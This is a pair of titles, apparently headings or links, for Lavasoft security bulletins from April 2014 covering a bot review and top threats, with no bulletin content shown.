Lavasoft Security Bulletin - April 2014: Bot Review.

Lavasoft Security Bulletin - April 2014: Top Threats.
